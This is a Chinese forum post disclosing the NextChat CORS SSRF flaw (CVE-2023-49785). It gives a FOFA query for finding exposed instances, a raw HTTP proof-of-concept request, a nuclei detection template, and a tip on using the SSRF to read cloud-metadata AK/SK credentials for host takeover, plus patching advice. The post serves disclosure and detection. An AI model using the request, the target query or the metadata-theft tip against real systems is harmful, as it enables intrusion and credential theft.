论坛首页 > 技术文章投稿区 > 漏洞文章

NextChat cors SSRF漏洞 (CVE-2023-49785)

我是大白   ·   发表于 2024-03-14 20:26:41   ·   漏洞文章

NextChat cors SSRF漏洞 (CVE-2023-49785)

漏洞描述

NextChat 是一个面向用户的GPT类应用程序,用户可以通过这个程序与GPT进行交互。2024年3月,互联网上披露CVE-2023-49785 NextChat cors SSRF 漏洞,攻击者可在无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等。

tips:结合云主机的特点,可通过ssrf访问云主机元数据,例如读取AK/SK,实现云主机接管。

产品界面

fofa语法

title="NextChat"

POC

  1. GET /api/cors/https/www.baidu.com HTTP/1.1
  2.  Host: 
  3.  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 
  4. (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
  5.  Connection: close
  6.  Accept: */*
  7.  Accept-Language: en
  8.  Accept-Encoding: gzip

nuclei验证

  1.  id: CVE-2023-49785
  3. info:
  4.   name: NextChat cors SSRF漏洞 CVE-2023-49785
  5.   author: nobody
  6.   severity: high
  7.   description: |
  8.     NextChat 是一个面向用户的GPT类应用程序,用户可以通过这个程序与GPT进行交互。
  9. 20243月,互联网上披露CVE-2023-49785 NextChat cors SSRF 漏洞,攻击者可在
  10. 无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等。
  11.   impact: |
  12.     攻击者可在无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等.
  13.   remediation: |
  14.     升级版本,打补丁
  15.   metadata:
  16.     verified: true
  17.     max-request: 3
  18.     fofa-query: title="NextChat"
  19.   tags: ai,gpt,nextchat,ssrf
  21. 修复建议 
  22. 建议升级到最新版本或打补丁
  23. 非必要禁止公网访问或白名单访问
  24. requests:
  25.   - raw:
  26.       - |
  27.         GET /api/cors/https/www.baidu.com HTTP/1.1
  28.         Host: {{Hostname}}
  29.         User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) 
  30. AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 
  31. Safari/537.36
  32.         Connection: close
  33.         Accept: */*
  34.         Accept-Language: en
  35.         Accept-Encoding: gzip
  37.     matchers:
  38.       - type: dsl
  39.         dsl:
  40.           - status_code == 200 && contains_all(body,"京ICP证030173
  41. 号")

修复建议

  • 建议升级到最新版本或打补丁
  • 非必要禁止公网访问或白名单访问

打赏我,让我更有动力~

0 条回复   |  直到 8个月前 | 572 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.